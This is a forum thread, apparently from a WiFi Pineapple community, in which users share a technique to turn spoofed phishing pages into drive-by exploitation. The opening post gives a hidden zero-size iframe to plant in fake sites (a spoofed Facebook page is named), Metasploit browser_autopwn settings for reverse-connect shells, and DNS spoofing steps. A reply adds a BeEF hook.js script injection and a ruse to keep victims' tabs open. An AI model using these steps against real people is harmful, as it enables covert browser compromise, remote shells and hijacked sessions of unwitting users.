Jump to content

Pine-Phishing... Why harvest credentials when you can harvest a shell (or both)?!?!


skysploit
 Share

Recommended Posts

So, here's a simple change that could pay out big (in a pinch) on a pentest...

How does it work?

It embeds a tiny iframe (about the size of a ".") at the bottom of a spoofed webpage. Once someone browses to the site they're immediately connected to the attacking machine. Dozens of exploits are then sent back to the victim. If the attack is successful, the attacking machine will receive a meterpreter shell.

How to set it up.

  1. Add the iframe below to any/all of your spoofed sites. Example, the "facebook.html" file from Darren's "phish-pineapple.zip".
  2. Open msfconsole and "use auxiliary/server/browser_autopwn"
  3. Set the options below (n00b's, let Google be your guide)
  4. Turn on "DNS Spoof" from the main page of the Pineapple.
  5. Wait for the victim (subject/client) to browse to the site. Once a connection to the spoofed page has been initiated you will fire a tasty batch of exploits.

Quick note with browser_autopwn (for those that have not used it): It is a very finicky auxiliary module within the msf. It will more than likely fail on a patched system (hence the purpose of pentesting). Not to mention the amount of traffic that is generated by browser_autopwn. It's always best to enumerate, find out what browsers are being used, then perform a targeted attack.

Side note: Pentesting at Starbucks can get you put in jail...

Happy (responsible) hacking!
~skysploit

iframe (add this to the end of the script)

"iframe SRC="http://172.16.42.42:8080/hacked" height = "0" width ="0"/"                                
Note: replace the " " at the beginning and end with < > 

Settings for browser_autopwn

msf  auxiliary(browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name           Current Setting   Required       Description
   ----           ---------------   --------       -----------
   LHOST            172.16.42.42      yes          The IP address to use for reverse-connect payloads
   SRVHOST          172.16.42.42      yes          The local host to listen on. 
   SRVPORT          8080              yes          The local port to listen on.
   SSL              false             no           Negotiate SSL for incoming connections
   SSLCert                            no           Path to a custom SSL certificate 
   SSLVersion       SSL3              no           Specify the version of SSL that should be used
   URIPATH          /hacked           no           The URI to use for this exploit (default is random)

msf  auxiliary(browser_autopwn) > exploit

.......
(Server build process was pulled out)
.......

[*] --- Done, found 53 exploit modules
Link to comment
Share on other sites

This methold could also be used the BeEF, placing the hook.js script directly onto a fake webpage on the pineapple and the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking.

Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background.

inject this:

<script language='Javascript' src="192.168.1.100/hook.js"></script> 

where 192.168.1.100 is the IP address (local or remote) of the beEF server

Edited by inTheDMZ
Link to comment
Share on other sites

This methold could also be used the BeEF, placing the hook.js script directly onto a fake webpage on the pineapple and the beEF server can sit on the same network as the pineapple or even on a VPS/Home server for remote beEF hooking.

Create a webpage that suggests the tab needs to be kept open for internet access to remain and most users would be fooled enough to keep it open in the background.

Could work, some sites ask you to keep another window/tab open while a download finishes, etc...

Maybe a module should be created :lol:

-Foxtrot

EDIT: Has anyone got part or all of the BeEF to run on the Pineapple? Never looked into it..

Edited by Foxtrot
Link to comment
Share on other sites

Wait... Pineapple's firmware includes metasploit framework? Get outta town!

crepsidro, I have not personally tried to run msf on the pineapple. I dont think it has the "juice" to support it. Here's a little more info on preparing for the autopwn attack. There's multiple ways to this, below is the way I typically setup my connections.

  1. Connect the Pineapple to your ethernet port and connect your wireless card to a wireless network.
  2. Using Backtrack runnning in a VM, connect both the wireless card and the ethernet port to the VM (yes, i pull both resources from the hosting machine to the VM).
  3. Run the pineapple setup script and set your ethernet port to the default address (172.16.42.42), set the wifi adapter to the networks gateway address.
  4. Open Metasploit using "msfconsole" or "msfcli" (Again use Google as a reference to help set the parameters above)

Hope this helps.

~skysploit

Link to comment
Share on other sites

Yes, sorry, i figured it out - been stupid. I thought at some point you were talking about standalone metasploit implementation.

If i have my laptop i dont need a pineapple - wifi adapter works as fine.

Well who's to say that you can't setup a remote listener and have the iframe pointed to that location. Or possibly have the laptop within wireless range of the pineapple.

Link to comment
Share on other sites

Pretty sure no. To many dependencies and it is a resource hog.

Heh, should try running metasploit on a pda! I've done it, once. It was painful, but it worked.

Not my device, but that's what I had.

msf_n800.jpg​ <<----- Why is this getting added after every image?

Edited by barry99705
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...